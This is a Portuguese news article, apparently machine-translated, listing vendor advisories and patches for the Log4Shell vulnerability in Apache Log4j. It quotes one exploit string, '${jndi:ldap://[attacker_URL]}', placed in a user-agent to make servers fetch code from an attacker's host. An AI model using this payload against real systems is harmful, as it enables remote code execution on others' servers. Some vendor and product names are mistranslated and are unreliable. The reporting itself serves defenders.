Log4j: Lista de produtos vulneráveis e avisos de fornecedores

As notícias sobre uma vulnerabilidade crítica na biblioteca de registro Apache Log4j vazaram na semana passada quando explorações de prova de conceito começaram a surgir na quinta-feira.

Log4j é uma estrutura de registro Java de código aberto parte dos Serviços de Registro Apache usados em nível corporativo em vários aplicativos de fornecedores em todo o mundo.

Embora a exploração maciça tenha começado apenas depois que o código de exploração se tornou livremente disponível, os ataques foram detectados desde o início do mês, de acordo com dados da Cloudflare e cisco Talos.

A falha do Log4Shell foi relatada pela equipe de segurança cloud do Alibaba em 24 de novembro e não está claro como alguns atacantes foram capazes de explorá-la tão cedo.

Em um comunicado no sábado sobre a vulnerabilidade do Log4Shell, Jen Easterly, diretora da Agência de Segurança cibernética e infraestrutura (CISA), diz que a agência está trabalhando com parceiros do setor privado e público para resolver o problema.

Log4Shell é uma injeção JNDI (Java Naming and Directory Interface, interface de nomeação e diretório) que permite a execução de código remoto não autenticado. Os adversários podem aproveitá-lo alterando o usuário-agente em seu navegador para uma sequência no seguinte formato: .${jndi:ldap://[attacker_URL]}

A sequência permanecerá nos registros do servidor web da vítima e forçará um retorno de chamada ou solicitação à URL do invasor quando a biblioteca Log4j analisar. Os atacantes podem usar a sequência para passar comandos codificados ou classes Java para a máquina vulnerável.

Imediatamente após os detalhes sobre o Log4Shell se tornarem conhecidos, os fornecedores começaram a investigar se seus produtos são afetados e forneceram informações sobre os resultados:

Adobe:

A Adobe determinou que o ColdFusion 2021 é vulnerável ao Log4Shell e abordou o risco de segurança em uma atualização lançada em 14 de dezembro. Uma solução alternativa está disponível se o patching não for possível imediatamente.

Amazônia:

A Amazon atualizou vários de seus produtos para usar uma versão não vulnerável do componente Log4j e anunciou que está em processo de atualização de outros ou lançará novas versões em breve.

A empresa publicou detalhes específicos para os serviços afetados, entre eles o OpenSearch, AWS Glue, S3, CloudFront, AWS Greengrass e API Gateway.

Atlassian:

Com base em sua avaliação, a empresa acredita que nenhum produto local é vulnerável à exploração em sua configuração padrão.

Modificar a configuração padrão de registro (log4j.properties) para habilitar a funcionalidade JMS Appender pode trazer o risco de execução remota de código em alguns produtos, como Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye e Crucible.

Broadcom:

A empresa publicou itens de mitigação e base de conhecimento para vários produtos Symantec afetados pela vulnerabilidade do Log4j. Estes incluem a Autenticação Avançada da CA, o Symantec SiteMinder (CA Single Sign-on), o VIP Authentication Hub e o Symantec Endpoint Protection Manager (SEPM).

Cisco:

A Cisco publicou uma lista de seus produtos afetados pelo Log4Shell, juntamente com um calendário para corrigir alguns deles a partir de 14 de dezembro.

Os produtos afetados são de várias categorias, incluindo os seguintes:

  • Dispositivos de segurança de rede e conteúdo (Mecanismo de Serviços de Identidade, Defesa contra ameaças de poder de fogo, aplicativo avançado de relatórios de segurança da Web)
  • Colaboração e mídias sociais (Cisco Webex Meetings Server)
  • Gerenciamento e provisionamento de rede (Cisco CloudCenter Suite Admin, Data Center Network Manager, IoT Control Center, Network Services Orchestrator, WAN Automation Engine)
  • Roteamento e comutação empresarial (Cisco Network Assurance Engine e Cisco SD-WAN vManage)

Citrix:

Embora a investigação ainda esteja em andamento e o status possa mudar para alguns de seus produtos, a Citrix não listou nenhum de seus produtos como sendo vulnerável ao Log4Shell.

ConnectWise:

O serviço de nuvem da empresa, Perch, foi encontrado para contar com componentes de terceiros que eram “potencialmente vulneráveis”, lê um aviso do ConnectWise.

O terceiro vulnerável foi identificado como FortiGuard’s FortiGuard’s FortiSIEM, que é usado pela solução StratoZen do ConnectWise, levando a empresa a restringir temporariamente o acesso aos servidores StratoZen hospedados. O acesso agora é restaurado para a maioria dos serviços.

cPanel:

Um thread de fórum mostra que apenas os casos em que o plugin cPanel Solr está presente são afetados e podem ser explorados, mas apenas localmente.

Um membro da equipe forneceu mais tranquilidade anunciando que uma atualização com mitigação para o Log4Shell está disponível para o pacote cpanel-dovecot-solr.

Debian:

O pacote Log4j corrigido foi adicionado ao Debian 9 (Stretch), 10 (Buster), 11 (Bullseye) e 12 (Bookworm) como uma atualização de segurança, lê o aviso.

Docker:

Uma dúzia de imagens oficiais do Docker foram encontradas para usar uma versão vulnerável da biblioteca Log4j. A lista inclui couchbase, elasticsearch, logstash, sonarqubee solr.

Docker diz que está “no processo de atualização do Log4j 2 nessas imagens para a versão mais recente disponível” e que as imagens podem não estar vulneráveis por outras razões.

FortiGuard:

Um aviso da empresa lista quase uma dúzia de seus produtos como vulneráveis, com correções ou mitigações já implantadas para quatro deles.

A FortiGuard anunciou que o aviso seria atualizado com as datas para a aplicação de correções para outros produtos, como FortiSIEM, FortiInsight, FortiMonitor, FortiPortal, FortiPolicy e ShieldX.

F-Secure:

Ambas as versões do Windows e linux de vários produtos F-Secure são impactadas pelo Log4Shell: Policy Manager (apenas o componente Policy Manager Server), Policy Manager Proxy, Endpoint Proxy e Elements Connector.

A empresa criou um patch de segurança para os administradores corrigirem o problema e forneceu instruções passo a passo para implantá-lo.

Ghidra:

A ferramenta de engenharia reversa de código aberto da NSA recebeu uma atualização para a versão 10.1 que também atualiza a dependência do Log4j para uma iteração não vulnerável.

IBM:

A assessoria da IBM para o Log4Shell mostra que apenas as versões 9.0 e 8.5 do WebSphere Application foram afetadas pela vulnerabilidade, através do Console administrativo e dos componentes do Aplicativo de Registro UDDI, e que o problema foi resolvido.

Redes Juniper:

A empresa de networking divulgou que quatro de seus produtos são impactados: Paragon Active Assurance, Paragon Insights, Paragon Pathfinder e Paragon Planner.

Enquanto a avaliação continua, nesta fase outros seis produtos podem ser afetados: JSA Series, Junos Space Management Applications, Junos Space Network Management Platform, Network Director, Secure Analytics e Security Director (não Security Director Insights)

McAfee:

A empresa ainda não completou sua avaliação e tem 12 produtos em análise e atualizará a assessoria com informações relevantes à medida que estiver disponível.

MongoDB:

Apenas o MongoDB Atlas Search precisava ser corrigido contra o Log4Shell, observa a empresa em um comunicado atualizado hoje

O desenvolvedor acrescenta que não encontrou nenhuma evidência de exploração ou indicadores de compromisso antes de implantar o patch.

Okta:

A Okta liberou atualizações para o Okta RADIUS Server Agent e o Okta On-Prem MFA Agent para mitigar o risco da vulnerabilidade Log4Shell e recomenda fortemente que os clientes apliquem as correções do Console administrativo.

Oracle:

A Oracle disse que “um número” de seus produtos, sem divulgar quais ou quantos, estão usando uma versão vulnerável do componente Log4j.

A empresa encaminhou seus clientes para o My Oracle Support Document e lançou um alerta de segurança com uma forte recomendação para aplicar as atualizações fornecidas “o mais rápido possível”.

Fundação OWASP:

Um aviso na sexta-feira revelou que versões do scanner de aplicativos web Zed Attack Proxy (ZAP) abaixo do 2.11.1 usam um componente Log4j vulnerável.

Chapéu Vermelho:

Componentes em vários produtos Red Hat são afetados pelo Log4Shell, a organização divulgou na sexta-feira, recomendando fortemente que os clientes apliquem as atualizações assim que estiverem disponíveis.

Entre os produtos listados no aviso estão Red Hat OpenShift 4 e 3.11, OpenShift Logging, OpenStack Platform 13, CodeReady Studio 12, Data Grid 8 e Red Hat Fuse 7.

Siemens:

A empresa descobriu que vários produtos são vulneráveis ao Log4Shell. O problema foi corrigido em alguns produtos, enquanto para outros estão sendo realizados testes para soluções de longo prazo.

Recomenda-se que os clientes atualizem o software da Siemens para a versão mais recente ou apliquem as soluções e mitigações que a empresa forneceu em sua assessoria, bem como sigam as orientações gerais de segurança.

SolarWinds:

Dois produtos da empresa usam uma versão vulnerável do Apache Log4j: Server & Application Monitor (SAM) e Database Performance Analyzer (DPA).

No entanto, ambos os produtos usam uma versão do Java Development Kit (JDK) que não é suscetível à vulnerabilidade logj4 ou reduz o risco.

SonarSource:

Um componente ElasticSearch no SonarQube usa a biblioteca Log4j e a empresa fornece mitigação para evitar qualquer risco. Uma correção, se necessário, estará disponível.

Por precaução, a SonarSource atualizou o SonarCloud para executar uma versão não vulnerável do Log4j, embora o produto de lá “não estivesse diretamente suscetível a essa vulnerabilidade”.

SonicWall:

Uma investigação em andamento revelou que a versão 10.x de Segurança de E-mail da SonicWall é impactada pela vulnerabilidade do Log4Shell. Uma correção está em desenvolvimento e deve ser lançada “em breve”.

Outros cinco produtos da SonicWall ainda estão sob revisão e o resto deles não deve ser impactado pelo problema, de acordo com um comunicado da empresa atualizado pela última vez no sábado.

Sófos:

A empresa descobriu que o Sophos Mobile EAS Proxy é vulnerável e recomenda que os clientes baixem a versão 9.72 para resolver o problema.

O Sophos Email e o Cloud Optix foram corrigidos antes que o ator de ameaças tentasse explorar a vulnerabilidade.

Splunk:

O Core Splunk Enterprise não é afetado a menos que a Pesquisa de Tecido de Dados seja usada. A empresa publicou uma tabela com as versões de seus produtos afetados pelo Log4Shell tanto na nuvem quanto no local.

No momento da redação, a empresa lançou correções para alguns produtos e atualmente está trabalhando em atualizações de rolamento para pelo menos sete de seus produtos.

TrendMicro:

A maioria dos produtos não é afetada pela vulnerabilidade do Log4Shell. Um pequeno número de serviços afetados foram corrigidos: Vision One, Trend Micro Email Security & HES, TippingPoint Threat Management Center (TMC), Sandbox as a Service e Cloud App Security.

VMware:

A VMware corrigiu vários de seus produtos vulneráveis a ataques log4Shell e atualmente está trabalhando para lançar patches para outros 27 produtos.

Em comunicado atualizado pela última vez hoje, a empresa lista quase 40 de seus produtos impactados pela vulnerabilidade crítica. Muitos deles mostram um “Patch Pending” e as mitigações estão disponíveis em alguns casos.

Ubiquiti:

O aplicativo unifi network, que usa a biblioteca Log4j, foi atualizado para atender à vulnerabilidade crítica do Log4Shell.

Ubuntu:

O pacote Log4j foi corrigido rio acima, lê o aviso de segurança, e a atualização agora tem que escorrer para ubuntu 18.04 LTS (Bionic Beaver), 20.04 LTS (Focal Fossa), 21.04 (Hirsute Hippo) e 21.10 (Impish Indri).

Zoho:

A empresa descobriu que o componente ADAudit Plus para auditar as alterações do Active Directory, que faz parte da solução de monitoramento ManageEngine, é vulnerável a ataques do Log4Shell.

Em um breve post hoje, Zoho forneceu instruções para mitigar o problema.

Zscaler:

A Zscaler corrigiu vários de seus produtos que usavam uma versão vulnerável da biblioteca Log4j. Depois de corrigir todos os seus serviços de Acesso Privado (ZPA) voltados para a internet pública, Zscaler Mobile Admin e suporte de componentes do Administrador Móvel, a empresa concluiu que o problema foi corrigido em todos os seus produtos.

O acima não é uma lista exaustiva de fornecedores que estão investigando ou consertaram seus produtos contra o Log4Shell. Um inventário mais abrangente está disponível no Dutch Nationaal Cyber Security Centrum, para softwares vulneráveis/não vulneráveis conhecidos.

 

Continue lendo